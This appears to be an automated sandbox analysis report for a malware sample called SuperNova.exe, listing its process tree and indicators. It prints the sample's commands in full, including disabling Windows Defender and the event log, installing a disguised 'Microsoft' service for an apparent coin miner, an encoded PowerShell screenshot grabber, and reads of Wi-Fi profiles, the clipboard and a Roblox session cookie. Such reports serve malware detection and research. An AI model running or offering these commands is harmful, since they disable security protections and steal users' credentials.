Suspicious use of WriteProcessMemory 64 IoCs
Processes:
SuperNova.exeStageSN.exeStageSN.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 1632 wrote to memory of 4168 1632 SuperNova.exe SNInstallerHandler.exe PID 1632 wrote to memory of 4168 1632 SuperNova.exe SNInstallerHandler.exe PID 1632 wrote to memory of 4772 1632 SuperNova.exe StageSN.exe PID 1632 wrote to memory of 4772 1632 SuperNova.exe StageSN.exe PID 4772 wrote to memory of 3444 4772 StageSN.exe StageSN.exe PID 4772 wrote to memory of 3444 4772 StageSN.exe StageSN.exe PID 3444 wrote to memory of 4708 3444 StageSN.exe cmd.exe PID 3444 wrote to memory of 4708 3444 StageSN.exe cmd.exe PID 3444 wrote to memory of 4600 3444 StageSN.exe cmd.exe PID 3444 wrote to memory of 4600 3444 StageSN.exe cmd.exe PID 3444 wrote to memory of 3620 3444 StageSN.exe cmd.exe PID 3444 wrote to memory of 3620 3444 StageSN.exe cmd.exe PID 4600 wrote to memory of 4092 4600 cmd.exe powershell.exe PID 4600 wrote to memory of 4092 4600 cmd.exe powershell.exe PID 4708 wrote to memory of 2072 4708 cmd.exe powershell.exe PID 4708 wrote to memory of 2072 4708 cmd.exe powershell.exe PID 3620 wrote to memory of 4588 3620 cmd.exe powershell.exe PID 3620 wrote to memory of 4588 3620 cmd.exe powershell.exe PID 3444 wrote to memory of 4140 3444 StageSN.exe cmd.exe PID 3444 wrote to memory of 4140 3444 StageSN.exe cmd.exe PID 3444 wrote to memory of 4456 3444 StageSN.exe cmd.exe PID 3444 wrote to memory of 4456 3444 StageSN.exe cmd.exe PID 4140 wrote to memory of 4320 4140 cmd.exe tasklist.exe PID 4140 wrote to memory of 4320 4140 cmd.exe tasklist.exe PID 4456 wrote to memory of 3652 4456 cmd.exe tasklist.exe PID 4456 wrote to memory of 3652 4456 cmd.exe tasklist.exe PID 3444 wrote to memory of 2772 3444 StageSN.exe cmd.exe PID 3444 wrote to memory of 2772 3444 StageSN.exe cmd.exe PID 2772 wrote to memory of 3272 2772 cmd.exe powercfg.exe PID 2772 wrote to memory of 3272 2772 cmd.exe powercfg.exe PID 3444 wrote to memory of 3380 3444 StageSN.exe cmd.exe PID 3444 wrote to memory of 3380 3444 StageSN.exe cmd.exe PID 3444 wrote to memory of 1328 3444 StageSN.exe cmd.exe PID 3444 wrote to memory of 1328 3444 StageSN.exe cmd.exe PID 3444 wrote to memory of 1060 3444 StageSN.exe cmd.exe PID 3444 wrote to memory of 1060 3444 StageSN.exe cmd.exe PID 3444 wrote to memory of 3456 3444 StageSN.exe wmiprvse.exe PID 3444 wrote to memory of 3456 3444 StageSN.exe wmiprvse.exe PID 3444 wrote to memory of 736 3444 StageSN.exe cmd.exe PID 3444 wrote to memory of 736 3444 StageSN.exe cmd.exe PID 3444 wrote to memory of 4336 3444 StageSN.exe Conhost.exe PID 3444 wrote to memory of 4336 3444 StageSN.exe Conhost.exe PID 3444 wrote to memory of 872 3444 StageSN.exe cmd.exe PID 3444 wrote to memory of 872 3444 StageSN.exe cmd.exe PID 3380 wrote to memory of 5328 3380 cmd.exe tasklist.exe PID 3380 wrote to memory of 5328 3380 cmd.exe tasklist.exe PID 1328 wrote to memory of 5380 1328 cmd.exe powershell.exe PID 1328 wrote to memory of 5380 1328 cmd.exe powershell.exe PID 1060 wrote to memory of 5508 1060 cmd.exe tree.com PID 1060 wrote to memory of 5508 1060 cmd.exe tree.com PID 4336 wrote to memory of 5500 4336 cmd.exe reg.exe PID 4336 wrote to memory of 5500 4336 cmd.exe reg.exe PID 3456 wrote to memory of 5572 3456 cmd.exe netsh.exe PID 3456 wrote to memory of 5572 3456 cmd.exe netsh.exe PID 872 wrote to memory of 5580 872 cmd.exe powershell.exe PID 872 wrote to memory of 5580 872 cmd.exe powershell.exe PID 736 wrote to memory of 5588 736 cmd.exe systeminfo.exe PID 736 wrote to memory of 5588 736 cmd.exe systeminfo.exe PID 3444 wrote to memory of 5704 3444 StageSN.exe cmd.exe PID 3444 wrote to memory of 5704 3444 StageSN.exe cmd.exe PID 3444 wrote to memory of 5784 3444 StageSN.exe cmd.exe PID 3444 wrote to memory of 5784 3444 StageSN.exe cmd.exe PID 5348 wrote to memory of 5900 5348 cmd.exe wusa.exe PID 5348 wrote to memory of 5900 5348 cmd.exe wusa.exe -
Views/modifies file attributes 1 TTPs 6 IoCs
Processes:
attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exepid process 5988 attrib.exe 2276 attrib.exe 1516 attrib.exe 916 attrib.exe 2488 attrib.exe 3580 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\SuperNova.exe"C:\Users\Admin\AppData\Local\Temp\SuperNova.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1632 -
C:\Users\Admin\AppData\Local\Temp\CriticalFiles\SNInstallerHandler.exe"C:\Users\Admin\AppData\Local\Temp\CriticalFiles\SNInstallerHandler.exe"2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:4168 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1820 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart3⤵
- Suspicious use of WriteProcessMemory
PID:5348 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart4⤵PID:5900
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc3⤵
- Launches sc.exe
PID:5368 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:5664 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv3⤵
- Launches sc.exe
PID:5964 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits3⤵
- Launches sc.exe
PID:6128 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc3⤵
- Launches sc.exe
PID:5140 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2732 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:740 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5392 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5088 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "Microsoft"3⤵
- Launches sc.exe
PID:4672 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "Microsoft" binpath= "C:\ProgramData\Non-Delete-Critical-files\CoinService.exe" start= "auto"3⤵
- Launches sc.exe
PID:5236 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
PID:5984 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "Microsoft"3⤵
- Launches sc.exe
PID:5904 -
C:\Users\Admin\AppData\Local\Temp\CriticalFiles\StageSN.exe"C:\Users\Admin\AppData\Local\Temp\CriticalFiles\StageSN.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:4772 -
C:\Users\Admin\AppData\Local\Temp\CriticalFiles\StageSN.exe"C:\Users\Admin\AppData\Local\Temp\CriticalFiles\StageSN.exe"3⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3444 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\CriticalFiles\StageSN.exe'"4⤵
- Suspicious use of WriteProcessMemory
PID:4708 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\CriticalFiles\StageSN.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2072 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"4⤵
- Suspicious use of WriteProcessMemory
PID:4600 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4092 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"4⤵
- Suspicious use of WriteProcessMemory
PID:3620 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4588 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵
- Suspicious use of WriteProcessMemory
PID:4140 -
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4320 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵
- Suspicious use of WriteProcessMemory
PID:4456 -
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3652 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"4⤵
- Suspicious use of WriteProcessMemory
PID:2772 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3272 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵
- Suspicious use of WriteProcessMemory
PID:3380 -
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5328 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"4⤵
- Suspicious use of WriteProcessMemory
PID:1328 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5380 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵
- Suspicious use of WriteProcessMemory
PID:1060 -
C:\Windows\system32\tree.comtree /A /F5⤵PID:5508
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"4⤵
- Suspicious use of WriteProcessMemory
PID:3456 -
C:\Windows\system32\netsh.exenetsh wlan show profile5⤵
- Event Triggered Execution: Netsh Helper DLL
PID:5572 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"4⤵
- Suspicious use of WriteProcessMemory
PID:736 -
C:\Windows\system32\systeminfo.exesysteminfo5⤵
- Gathers system information
PID:5588 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"4⤵
- Suspicious use of WriteProcessMemory
PID:4336 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath5⤵PID:5500
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="4⤵
- Suspicious use of WriteProcessMemory
PID:872 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5580 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qvtpgklb\qvtpgklb.cmdline"6⤵PID:5316
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5842.tmp" "c:\Users\Admin\AppData\Local\Temp\qvtpgklb\CSC2327F0BD1DF2435099376D62D343C87E.TMP"7⤵PID:4184
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:5704
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:5948
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"4⤵PID:5784
-
C:\Windows\system32\attrib.exeattrib -r C:\Windows\System32\drivers\etc\hosts5⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:5988 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:6040
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:5204
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"4⤵PID:6072
-
C:\Windows\system32\attrib.exeattrib +r C:\Windows\System32\drivers\etc\hosts5⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:2276 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:3952
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4744 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:4580
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:1144
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:5512
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:5856
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:5864
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:5532
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"4⤵PID:3732
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵
- Suspicious behavior: EnumeratesProcesses
PID:5816 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"4⤵PID:5668
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:5864
-
C:\Windows\system32\getmac.exegetmac5⤵PID:5260
-
